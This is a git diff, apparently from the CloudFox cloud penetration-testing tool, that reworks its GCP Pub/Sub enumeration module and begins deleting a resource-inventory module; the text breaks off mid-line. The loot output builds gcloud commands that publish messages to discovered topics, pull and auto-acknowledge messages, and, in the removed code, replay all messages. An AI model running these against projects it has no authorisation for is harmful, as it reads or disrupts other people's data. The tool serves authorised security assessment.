"gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBLICRESOURCES_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index e2ee5517..555fdd52 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -97,18 +97,24 @@ func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { return } - // Count public resources + // Count public resources and push subscriptions publicTopics := 0 publicSubs := 0 pushSubs := 0 for _, topic := range m.Topics { - if topic.IsPublicPublish || topic.IsPublicSubscribe { - publicTopics++ + for _, binding := range topic.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + publicTopics++ + break + } } } for _, sub := range m.Subscriptions { - if sub.IsPublicConsume { - publicSubs++ + for _, binding := range sub.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + publicSubs++ + break + } } if sub.PushEndpoint != "" { pushSubs++ @@ -176,267 +182,140 @@ func (m *PubSubModule) processProject(ctx context.Context, projectID string, log // Loot File Management // ------------------------------ func (m *PubSubModule) initializeLootFiles() { - m.LootMap["pubsub-gcloud-commands"] = &internal.LootFile{ - Name: "pubsub-gcloud-commands", - Contents: "# Pub/Sub gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["pubsub-public"] = &internal.LootFile{ - Name: "pubsub-public", - Contents: "# PUBLIC Pub/Sub Resources\n# Generated by CloudFox\n# These resources allow public access!\n\n", - } - m.LootMap["pubsub-push-endpoints"] = &internal.LootFile{ - Name: "pubsub-push-endpoints", - Contents: "# Pub/Sub Push Endpoints\n# Generated by CloudFox\n# Messages are pushed to these URLs\n\n", - } - m.LootMap["pubsub-exploitation"] = &internal.LootFile{ - Name: "pubsub-exploitation", - Contents: "# Pub/Sub Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - // New enhancement loot files - m.LootMap["pubsub-dead-letter"] = &internal.LootFile{ - Name: "pubsub-dead-letter", - Contents: "# Pub/Sub Dead Letter Topic Configuration\n# Failed messages are sent to these topics\n# Generated by CloudFox\n\n", - } - m.LootMap["pubsub-cross-project"] = &internal.LootFile{ - Name: "pubsub-cross-project", - Contents: "# Pub/Sub Cross-Project Subscriptions\n# These subscriptions consume from topics in other projects\n# Generated by CloudFox\n\n", - } - m.LootMap["pubsub-exports"] = &internal.LootFile{ - Name: "pubsub-exports", - Contents: "# Pub/Sub Export Destinations\n# BigQuery and Cloud Storage export targets\n# Generated by CloudFox\n\n", - } - m.LootMap["pubsub-no-retention"] = &internal.LootFile{ - Name: "pubsub-no-retention", - Contents: "# Pub/Sub Subscriptions WITHOUT Message Retention\n# Messages may be lost if not acknowledged\n# Generated by CloudFox\n\n", - } - m.LootMap["pubsub-security-recommendations"] = &internal.LootFile{ - Name: "pubsub-security-recommendations", - Contents: "# Pub/Sub Security Recommendations\n# Generated by CloudFox\n\n", + m.LootMap["pubsub-commands"] = &internal.LootFile{ + Name: "pubsub-commands", + Contents: "# Pub/Sub Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { - // gcloud commands - m.LootMap["pubsub-gcloud-commands"].Contents += fmt.Sprintf( - "# Topic: %s (Project: %s)\n"+ - "gcloud pubsub topics describe %s --project=%s\n"+ - "gcloud pubsub topics get-iam-policy %s --project=%s\n"+ - "gcloud pubsub topics list-subscriptions %s --project=%s\n\n", - topic.Name, topic.ProjectID, - topic.Name, topic.ProjectID, - topic.Name, topic.ProjectID, + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "## Topic: %s (Project: %s)\n"+ + "# Subscriptions: %d\n", topic.Name, topic.ProjectID, + topic.SubscriptionCount, ) - // Public topics - if topic.IsPublicPublish || topic.IsPublicSubscribe { - m.LootMap["pubsub-public"].Contents += fmt.Sprintf( - "# TOPIC: %s\n"+ - "# Project: %s\n"+ - "# Public Publish: %v\n"+ - "# Public Subscribe: %v\n"+ - "# Subscriptions: %d\n\n", - topic.Name, - topic.ProjectID, - topic.IsPublicPublish, - topic.IsPublicSubscribe, - topic.SubscriptionCount, - ) + if topic.KmsKeyName != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) } - // Exploitation commands - m.LootMap["pubsub-exploitation"].Contents += fmt.Sprintf( - "# Topic: %s (Project: %s)\n"+ - "# Public Publish: %v, Public Subscribe: %v\n\n"+ - "# Publish a message (if you have pubsub.topics.publish):\n"+ - "gcloud pubsub topics publish %s --message='test' --project=%s\n\n"+ - "# Create a subscription (if you have pubsub.subscriptions.create):\n"+ - "gcloud pubsub subscriptions create my-sub --topic=%s --project=%s\n\n", + if len(topic.IAMBindings) > 0 { + m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range topic.IAMBindings { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "\n# Describe topic:\n"+ + "gcloud pubsub topics describe %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud pubsub topics get-iam-policy %s --project=%s\n\n"+ + "# List subscriptions:\n"+ + "gcloud pubsub topics list-subscriptions %s --project=%s\n\n"+ + "# Publish a message:\n"+ + "gcloud pubsub topics publish %s --message='test' --project=%s\n\n", + topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, - topic.IsPublicPublish, topic.IsPublicSubscribe, topic.Name, topic.ProjectID, topic.Name, topic.ProjectID, ) - - // Add security recommendations - m.addTopicSecurityRecommendations(topic) } func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) { - // gcloud commands - m.LootMap["pubsub-gcloud-commands"].Contents += fmt.Sprintf( - "# Subscription: %s (Project: %s, Topic: %s)\n"+ - "gcloud pubsub subscriptions describe %s --project=%s\n"+ - "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n\n", - sub.Name, sub.ProjectID, sub.Topic, - sub.Name, sub.ProjectID, + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "## Subscription: %s (Project: %s)\n"+ + "# Topic: %s\n", sub.Name, sub.ProjectID, + sub.Topic, ) - // Push endpoints + // Cross-project info + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) + } + + // Push endpoint info if sub.PushEndpoint != "" { - m.LootMap["pubsub-push-endpoints"].Contents += fmt.Sprintf( - "# Subscription: %s\n"+ - "# Project: %s\n"+ - "# Topic: %s\n"+ - "# Push Endpoint: %s\n"+ - "# Service Account: %s\n\n", - sub.Name, - sub.ProjectID, - sub.Topic, + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "# Push Endpoint: %s\n"+ + "# Push Service Account: %s\n", sub.PushEndpoint, sub.PushServiceAccount, ) } - // Public subscriptions - if sub.IsPublicConsume { - m.LootMap["pubsub-public"].Contents += fmt.Sprintf( - "# SUBSCRIPTION: %s\n"+ - "# Project: %s\n"+ - "# Topic: %s\n"+ - "# Public Consume: true\n\n", - sub.Name, - sub.ProjectID, - sub.Topic, - ) + // Export destinations + if sub.BigQueryTable != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# BigQuery Export: %s\n", sub.BigQueryTable) + } + if sub.CloudStorageBucket != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# GCS Export: %s\n", sub.CloudStorageBucket) } - // Dead letter topic configuration + // Dead letter config if sub.DeadLetterTopic != "" { - m.LootMap["pubsub-dead-letter"].Contents += fmt.Sprintf( - "# Subscription: %s\n"+ - "# Project: %s\n"+ - "# Topic: %s\n"+ - "# Dead Letter Topic: %s\n"+ - "# Max Delivery Attempts: %d\n"+ - "gcloud pubsub subscriptions describe %s --project=%s\n\n", - sub.Name, - sub.ProjectID, - sub.Topic, + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "# Dead Letter Topic: %s (Max Attempts: %d)\n", sub.DeadLetterTopic, sub.MaxDeliveryAttempts, - sub.Name, sub.ProjectID, - ) - } - - // Cross-project subscriptions - if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { - m.LootMap["pubsub-cross-project"].Contents += fmt.Sprintf( - "# CROSS-PROJECT SUBSCRIPTION\n"+ - "# Subscription: %s (Project: %s)\n"+ - "# Subscribes to topic in: %s\n"+ - "# Topic: %s\n"+ - "# This indicates a trust relationship between projects\n"+ - "gcloud pubsub subscriptions describe %s --project=%s\n\n", - sub.Name, sub.ProjectID, - sub.TopicProject, - sub.Topic, - sub.Name, sub.ProjectID, - ) - } - - // Export destinations (BigQuery/GCS) - if sub.BigQueryTable != "" { - m.LootMap["pubsub-exports"].Contents += fmt.Sprintf( - "# BIGQUERY EXPORT\n"+ - "# Subscription: %s (Project: %s)\n"+ - "# Topic: %s\n"+ - "# BigQuery Table: %s\n"+ - "gcloud pubsub subscriptions describe %s --project=%s\n"+ - "bq show %s\n\n", - sub.Name, sub.ProjectID, - sub.Topic, - sub.BigQueryTable, - sub.Name, sub.ProjectID, - sub.BigQueryTable, - ) - } - if sub.CloudStorageBucket != "" { - m.LootMap["pubsub-exports"].Contents += fmt.Sprintf( - "# CLOUD STORAGE EXPORT\n"+ - "# Subscription: %s (Project: %s)\n"+ - "# Topic: %s\n"+ - "# GCS Bucket: %s\n"+ - "gcloud pubsub subscriptions describe %s --project=%s\n"+ - "gsutil ls gs://%s/\n\n", - sub.Name, sub.ProjectID, - sub.Topic, - sub.CloudStorageBucket, - sub.Name, sub.ProjectID, - sub.CloudStorageBucket, ) } - // No message retention (potential data loss) - if sub.MessageRetention == "" && !sub.RetainAckedMessages { - m.LootMap["pubsub-no-retention"].Contents += fmt.Sprintf( - "# Subscription: %s\n"+ - "# Project: %s\n"+ - "# Topic: %s\n"+ - "# No message retention configured - unacked messages may be lost\n"+ - "# Ack Deadline: %ds\n"+ - "gcloud pubsub subscriptions update %s --project=%s --message-retention-duration=7d\n\n", - sub.Name, - sub.ProjectID, - sub.Topic, - sub.AckDeadlineSeconds, - sub.Name, sub.ProjectID, - ) + // IAM bindings + if len(sub.IAMBindings) > 0 { + m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range sub.IAMBindings { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } } - // Add security recommendations - m.addSubscriptionSecurityRecommendations(sub) - - // Exploitation commands - m.LootMap["pubsub-exploitation"].Contents += fmt.Sprintf( - "# Subscription: %s (Project: %s)\n"+ - "# Topic: %s\n"+ - "# Public Consume: %v\n\n"+ - "# Pull messages (if you have pubsub.subscriptions.consume):\n"+ - "gcloud pubsub subscriptions pull %s --project=%s --limit=10 --auto-ack\n\n"+ - "# Seek to beginning (replay all messages):\n"+ - "gcloud pubsub subscriptions seek %s --time=2020-01-01T00:00:00Z --project=%s\n\n", + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "\n# Describe subscription:\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n\n"+ + "# Pull messages:\n"+ + "gcloud pubsub subscriptions pull %s --project=%s --limit=10 --auto-ack\n\n", sub.Name, sub.ProjectID, - sub.Topic, - sub.IsPublicConsume, sub.Name, sub.ProjectID, sub.Name, sub.ProjectID, ) + + // BigQuery command + if sub.BigQueryTable != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Query BigQuery export:\nbq show %s\n\n", sub.BigQueryTable) + } + + // GCS command + if sub.CloudStorageBucket != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# List GCS export:\ngsutil ls gs://%s/\n\n", sub.CloudStorageBucket) + } } // ------------------------------ // Output Generation // ------------------------------ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Topics table + // Topics table - one row per IAM binding topicsHeader := []string{ "Project Name", "Project ID", "Topic Name", "Subscriptions", - "Public Publish", - "Public Subscribe", "KMS Key", "Retention", + "IAM Role", + "IAM Member", } var topicsBody [][]string for _, topic := range m.Topics { - // Format public status - publicPublish := "No" - if topic.IsPublicPublish { - publicPublish = "YES" - } - publicSubscribe := "No" - if topic.IsPublicSubscribe { - publicSubscribe = "YES" - } - // Format KMS key kmsKey := "-" if topic.KmsKeyName != "" { - kmsKey = extractKmsKeyName(topic.KmsKeyName) + kmsKey = topic.KmsKeyName } // Format retention @@ -445,19 +324,36 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) retention = topic.MessageRetentionDuration } - topicsBody = append(topicsBody, []string{ - m.GetProjectName(topic.ProjectID), - topic.ProjectID, - topic.Name, - fmt.Sprintf("%d", topic.SubscriptionCount), - publicPublish, - publicSubscribe, - kmsKey, - retention, - }) + if len(topic.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range topic.IAMBindings { + topicsBody = append(topicsBody, []string{ + m.GetProjectName(topic.ProjectID), + topic.ProjectID, + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + kmsKey, + retention, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + topicsBody = append(topicsBody, []string{ + m.GetProjectName(topic.ProjectID), + topic.ProjectID, + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + kmsKey, + retention, + "-", + "-", + }) + } } - // Subscriptions table + // Subscriptions table - one row per IAM binding subsHeader := []string{ "Project Name", "Project ID", @@ -465,9 +361,10 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) "Topic", "Type", "Push Endpoint / Export", - "Public", + "Cross-Project", "Dead Letter", - "Ack Deadline", + "IAM Role", + "IAM Member", } var subsBody [][]string @@ -477,19 +374,19 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) destination := "-" if sub.PushEndpoint != "" { subType = "Push" - destination = truncateURL(sub.PushEndpoint) + destination = sub.PushEndpoint } else if sub.BigQueryTable != "" { subType = "BigQuery" - destination = truncateBQ(sub.BigQueryTable) + destination = sub.BigQueryTable } else if sub.CloudStorageBucket != "" { subType = "GCS" destination = sub.CloudStorageBucket } - // Format public status - publicConsume := "No" - if sub.IsPublicConsume { - publicConsume = "YES" + // Format cross-project + crossProject := "-" + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + crossProject = sub.TopicProject } // Format dead letter @@ -498,23 +395,43 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) deadLetter = sub.DeadLetterTopic } - subsBody = append(subsBody, []string{ - m.GetProjectName(sub.ProjectID), - sub.ProjectID, - sub.Name, - sub.Topic, - subType, - destination, - publicConsume, - deadLetter, - fmt.Sprintf("%ds", sub.AckDeadlineSeconds), - }) + if len(sub.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range sub.IAMBindings { + subsBody = append(subsBody, []string{ + m.GetProjectName(sub.ProjectID), + sub.ProjectID, + sub.Name, + sub.Topic, + subType, + destination, + crossProject, + deadLetter, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + subsBody = append(subsBody, []string{ + m.GetProjectName(sub.ProjectID), + sub.ProjectID, + sub.Name, + sub.Topic, + subType, + destination, + crossProject, + deadLetter, + "-", + "-", + }) + } } - // Collect loot files + // Collect loot files - only include if they have content beyond the header var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -566,185 +483,4 @@ func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) } } -// Helper functions - -// extractKmsKeyName extracts just the key name from the full KMS key path -func extractKmsKeyName(fullPath string) string { - parts := strings.Split(fullPath, "/") - if len(parts) > 0 { - return parts[len(parts)-1] - } - return fullPath -} - -// truncateURL truncates a URL for display -func truncateURL(url string) string { - if len(url) > 45 { - return url[:42] + "..." - } - return url -} -// truncateBQ truncates a BigQuery table reference for display -func truncateBQ(table string) string { - // Format: project:dataset.table - if len(table) > 40 { - parts := strings.Split(table, ".") - if len(parts) == 2 { - return "..." + parts[1] - } - return "..." + table[len(table)-30:] - } - return table -} - -// ------------------------------ -// Security Recommendations -// ------------------------------ - -// addTopicSecurityRecommendations generates security recommendations for a topic -func (m *PubSubModule) addTopicSecurityRecommendations(topic PubSubService.TopicInfo) { - var recommendations []string - - // Public publish access - CRITICAL - if topic.IsPublicPublish { - recommendations = append(recommendations, - fmt.Sprintf("[CRITICAL] Topic %s allows public publishing (allUsers/allAuthenticatedUsers)\n"+ - " Risk: Anyone can inject messages into this topic\n"+ - " Fix: Remove public access:\n"+ - " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allUsers --role=roles/pubsub.publisher\n"+ - " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allAuthenticatedUsers --role=roles/pubsub.publisher\n", - topic.Name, - topic.Name, topic.ProjectID, - topic.Name, topic.ProjectID)) - } - - // Public subscribe access - HIGH - if topic.IsPublicSubscribe { - recommendations = append(recommendations, - fmt.Sprintf("[HIGH] Topic %s allows public subscription (allUsers/allAuthenticatedUsers)\n"+ - " Risk: Anyone can create subscriptions to read messages\n"+ - " Fix: Remove public access:\n"+ - " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allUsers --role=roles/pubsub.subscriber\n"+ - " gcloud pubsub topics remove-iam-policy-binding %s --project=%s --member=allAuthenticatedUsers --role=roles/pubsub.subscriber\n", - topic.Name, - topic.Name, topic.ProjectID, - topic.Name, topic.ProjectID)) - } - - // No KMS encryption - MEDIUM - if topic.KmsKeyName == "" { - recommendations = append(recommendations, - fmt.Sprintf("[MEDIUM] Topic %s uses Google-managed encryption instead of CMEK\n"+ - " Risk: Less control over encryption keys\n"+ - " Fix: Configure customer-managed encryption:\n"+ - " gcloud pubsub topics update %s --project=%s --message-encryption-key-name=projects/PROJECT/locations/LOCATION/keyRings/KEYRING/cryptoKeys/KEY\n", - topic.Name, - topic.Name, topic.ProjectID)) - } - - // No message retention - LOW - if topic.MessageRetentionDuration == "" { - recommendations = append(recommendations, - fmt.Sprintf("[LOW] Topic %s has no message retention configured\n"+ - " Risk: Messages may be lost if subscribers are temporarily unavailable\n"+ - " Fix: Configure message retention:\n"+ - " gcloud pubsub topics update %s --project=%s --message-retention-duration=7d\n", - topic.Name, - topic.Name, topic.ProjectID)) - } - - // No subscriptions - INFO - if topic.SubscriptionCount == 0 { - recommendations = append(recommendations, - fmt.Sprintf("[INFO] Topic %s has no subscriptions\n"+ - " Risk: Messages published to this topic are not being consumed\n"+ - " Consider: Creating a subscription or removing unused topic\n", - topic.Name)) - } - - if len(recommendations) > 0 { - m.LootMap["pubsub-security-recommendations"].Contents += fmt.Sprintf( - "# Topic: %s (Project: %s)\n%s\n", - topic.Name, topic.ProjectID, - strings.Join(recommendations, "\n")) - } -} - -// addSubscriptionSecurityRecommendations generates security recommendations for a subscription -func (m *PubSubModule) addSubscriptionSecurityRecommendations(sub PubSubService.SubscriptionInfo) { - var recommendations []string - - // Public consume access - CRITICAL - if sub.IsPublicConsume { - recommendations = append(recommendations, - fmt.Sprintf("[CRITICAL] Subscription %s allows public message consumption\n"+ - " Risk: Anyone can read messages from this subscription\n"+ - " Fix: Remove public access:\n"+ - " gcloud pubsub subscriptions remove-iam-policy-binding %s --project=%s --member=allUsers --role=roles/pubsub.subscriber\n"+ - " gcloud pubsub subscriptions remove-iam-policy-binding %s --project=%s --member=allAuthenticatedUsers --role=roles/pubsub.subscriber\n", - sub.Name, - sub.Name, sub.ProjectID, - sub.Name, sub.ProjectID)) - } - - // Push endpoint without OIDC auth - HIGH - if sub.PushEndpoint != "" && sub.PushServiceAccount == "" { - recommendations = append(recommendations, - fmt.Sprintf("[HIGH] Push subscription %s has no OIDC authentication configured\n"+ - " Risk: Push endpoint may not verify message authenticity\n"+ - " Fix: Configure OIDC authentication:\n"+ - " gcloud pubsub subscriptions update %s --project=%s --push-auth-service-account=SA_EMAIL --push-auth-token-audience=AUDIENCE\n", - sub.Name, - sub.Name, sub.ProjectID)) - } - - // Push endpoint to external URL - MEDIUM - if sub.PushEndpoint != "" && !strings.Contains(sub.PushEndpoint, ".run.app") && !strings.Contains(sub.PushEndpoint, "cloudfunctions.net") { - recommendations = append(recommendations, - fmt.Sprintf("[MEDIUM] Push subscription %s sends to external endpoint: %s\n"+ - " Risk: Data exfiltration to external systems\n"+ - " Review: Verify this is an authorized endpoint\n"+ - " gcloud pubsub subscriptions describe %s --project=%s\n", - sub.Name, sub.PushEndpoint, - sub.Name, sub.ProjectID)) - } - - // No dead letter topic - LOW - if sub.DeadLetterTopic == "" { - recommendations = append(recommendations, - fmt.Sprintf("[LOW] Subscription %s has no dead letter topic configured\n"+ - " Risk: Failed messages may be lost without visibility\n"+ - " Fix: Configure dead letter topic:\n"+ - " gcloud pubsub subscriptions update %s --project=%s --dead-letter-topic=TOPIC_NAME --max-delivery-attempts=5\n", - sub.Name, - sub.Name, sub.ProjectID)) - } - - // Short ack deadline - INFO - if sub.AckDeadlineSeconds < 30 { - recommendations = append(recommendations, - fmt.Sprintf("[INFO] Subscription %s has short ack deadline (%ds)\n"+ - " Risk: Messages may be redelivered unnecessarily\n"+ - " Consider: Increasing ack deadline if processing takes longer:\n"+ - " gcloud pubsub subscriptions update %s --project=%s --ack-deadline=60\n", - sub.Name, sub.AckDeadlineSeconds, - sub.Name, sub.ProjectID)) - } - - // Cross-project subscription - INFO - if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { - recommendations = append(recommendations, - fmt.Sprintf("[INFO] Subscription %s consumes from topic in different project (%s)\n"+ - " Note: This indicates a cross-project trust relationship\n"+ - " Review: Verify this cross-project access is intended\n", - sub.Name, sub.TopicProject)) - } - - if len(recommendations) > 0 { - m.LootMap["pubsub-security-recommendations"].Contents += fmt.Sprintf( - "# Subscription: %s (Project: %s)\n%s\n", - sub.Name, sub.ProjectID, - strings.Join(recommendations, "\n")) - } -} diff --git a/gcp/commands/resourcegraph.go b/gcp/commands/resourcegraph.go deleted file mode 100644 index 4e3ae3c6..00000000 --- a/gcp/commands/resourcegraph.go +++ /dev/null @@ -1,741 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "sort" - "strings" - "sync" - - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" - - asset "cloud.google.com/go/asset/apiv1" - "cloud.google.com/go/asset/apiv1/assetpb" - "google.golang.org/api/iterator" -) - -// Module name constant -const GCP_RESOURCEGRAPH_MODULE_NAME string = "resource-graph" - -var GCPResourceGraphCommand = &cobra.Command{ - Use: GCP_RESOURCEGRAPH_MODULE_NAME, - Aliases: []string{"assets", "inventory", "cai"}, - Short: "Advanced resource query capabilities using Cloud Asset Inventory", - Long: `Query and analyze resources across projects using Cloud Asset Inventory. - -Features: -- Lists all resources across multiple projects -- Analyzes resource dependencies and relationships -- Identifies cross-project resources -- Generates comprehensive asset inventory -- Provides query templates for common security use cases -- Tracks resource metadata and labels - -Use Cases: -- Complete resource inventory for auditing -- Cross-project dependency mapping -- Resource lifecycle analysis -- Compliance evidence gathering -- Security posture assessment - -Requires appropriate IAM permissions: -- roles/cloudasset.viewer -- roles/resourcemanager.projectViewer`, - Run: runGCPResourceGraphCommand, -} - -// ------------------------------ -// Data Structures -// ------------------------------ - -type AssetResource struct { - Name string - AssetType string - ProjectID string - Location string - DisplayName string - ParentFullName string - CreateTime string - UpdateTime string - State string - Labels map[string]string - NetworkTags []string - ResourceURL string -} - -type ResourceDependency struct { - SourceResource string - SourceType string - TargetResource string - TargetType string - DependencyType string // uses, references, contains, manages - ProjectID string -} - -type CrossProjectResource struct { - ResourceName string - ResourceType string - OwnerProject string - AccessedFrom []string - AccessType string - RiskLevel string -} - -type ResourceTypeSummary struct { - AssetType string - Count int - ProjectIDs []string -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type ResourceGraphModule struct { - gcpinternal.BaseGCPModule - - // Module-specific fields - Assets []AssetResource - Dependencies []ResourceDependency - CrossProject []CrossProjectResource - TypeSummary map[string]*ResourceTypeSummary - LootMap map[string]*internal.LootFile - mu sync.Mutex - - // Tracking - totalAssets int - assetsByType map[string]int - assetsByProject map[string]int -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type ResourceGraphOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o ResourceGraphOutput) TableFiles() []internal.TableFile { return o.Table } -func (o ResourceGraphOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPResourceGraphCommand(cmd *cobra.Command, args []string) { - // Initialize command context - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_RESOURCEGRAPH_MODULE_NAME) - if err != nil { - return - } - - // Create module instance - module := &ResourceGraphModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Assets: []AssetResource{}, - Dependencies: []ResourceDependency{}, - CrossProject: []CrossProjectResource{}, - TypeSummary: make(map[string]*ResourceTypeSummary), - LootMap: make(map[string]*internal.LootFile), - assetsByType: make(map[string]int), - assetsByProject: make(map[string]int), - } - - // Initialize loot files - module.initializeLootFiles() - - // Execute enumeration - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *ResourceGraphModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Querying Cloud Asset Inventory for resource analysis...", GCP_RESOURCEGRAPH_MODULE_NAME) - - // Create Asset client - assetClient, err := asset.NewClient(ctx) - if err != nil { - logger.ErrorM(fmt.Sprintf("Failed to create Cloud Asset client: %v", err), GCP_RESOURCEGRAPH_MODULE_NAME) - return - } - defer assetClient.Close() - - // Process each project - var wg sync.WaitGroup - for _, projectID := range m.ProjectIDs { - wg.Add(1) - go func(project string) { - defer wg.Done() - m.processProject(ctx, project, assetClient, logger) - }(projectID) - } - wg.Wait() - - // Analyze cross-project dependencies - m.analyzeCrossProjectResources(logger) - - // Generate query templates - m.generateQueryTemplates() - - // Check results - if m.totalAssets == 0 { - logger.InfoM("No assets found via Cloud Asset Inventory", GCP_RESOURCEGRAPH_MODULE_NAME) - logger.InfoM("Ensure Cloud Asset API is enabled and you have appropriate permissions", GCP_RESOURCEGRAPH_MODULE_NAME) - return - } - - logger.SuccessM(fmt.Sprintf("Inventoried %d asset(s) across %d project(s)", - m.totalAssets, len(m.assetsByProject)), GCP_RESOURCEGRAPH_MODULE_NAME) - - // Show top asset types - typeCount := len(m.assetsByType) - if typeCount > 0 { - logger.InfoM(fmt.Sprintf("Found %d unique asset type(s)", typeCount), GCP_RESOURCEGRAPH_MODULE_NAME) - } - - // Write output - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *ResourceGraphModule) processProject(ctx context.Context, projectID string, assetClient *asset.Client, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Querying assets for project: %s", projectID), GCP_RESOURCEGRAPH_MODULE_NAME) - } - - parent := fmt.Sprintf("projects/%s", projectID) - - // List assets with content type set to get full resource details - req := &assetpb.ListAssetsRequest{ - Parent: parent, - ContentType: assetpb.ContentType_RESOURCE, - PageSize: 500, - } - - it := assetClient.ListAssets(ctx, req) - assetCount := 0 - - for { - asset, err := it.Next() - if err == iterator.Done { - break - } - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_RESOURCEGRAPH_MODULE_NAME, - fmt.Sprintf("Could not enumerate assets in project %s", projectID)) - break - } - - assetResource := m.parseAsset(asset, projectID) - - m.mu.Lock() - m.Assets = append(m.Assets, assetResource) - m.totalAssets++ - assetCount++ - - // Track by type - m.assetsByType[assetResource.AssetType]++ - - // Track by project - m.assetsByProject[projectID]++ - - // Update type summary - if summary, exists := m.TypeSummary[assetResource.AssetType]; exists { - summary.Count++ - // Add project if not already tracked - found := false - for _, p := range summary.ProjectIDs { - if p == projectID { - found = true - break - } - } - if !found { - summary.ProjectIDs = append(summary.ProjectIDs, projectID) - } - } else { - m.TypeSummary[assetResource.AssetType] = &ResourceTypeSummary{ - AssetType: assetResource.AssetType, - Count: 1, - ProjectIDs: []string{projectID}, - } - } - m.mu.Unlock() - - // Analyze dependencies - m.analyzeAssetDependencies(asset, projectID) - } - - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d assets in project %s", assetCount, projectID), GCP_RESOURCEGRAPH_MODULE_NAME) - } -} - -func (m *ResourceGraphModule) parseAsset(asset *assetpb.Asset, projectID string) AssetResource { - assetResource := AssetResource{ - Name: asset.Name, - AssetType: asset.AssetType, - ProjectID: projectID, - } - - // Parse resource data if available - if asset.Resource != nil { - assetResource.ParentFullName = asset.Resource.Parent - assetResource.ResourceURL = asset.Resource.DiscoveryDocumentUri - assetResource.Location = asset.Resource.Location - - // Extract display name from resource data - if asset.Resource.Data != nil { - if name, ok := asset.Resource.Data.Fields["name"]; ok { - assetResource.DisplayName = 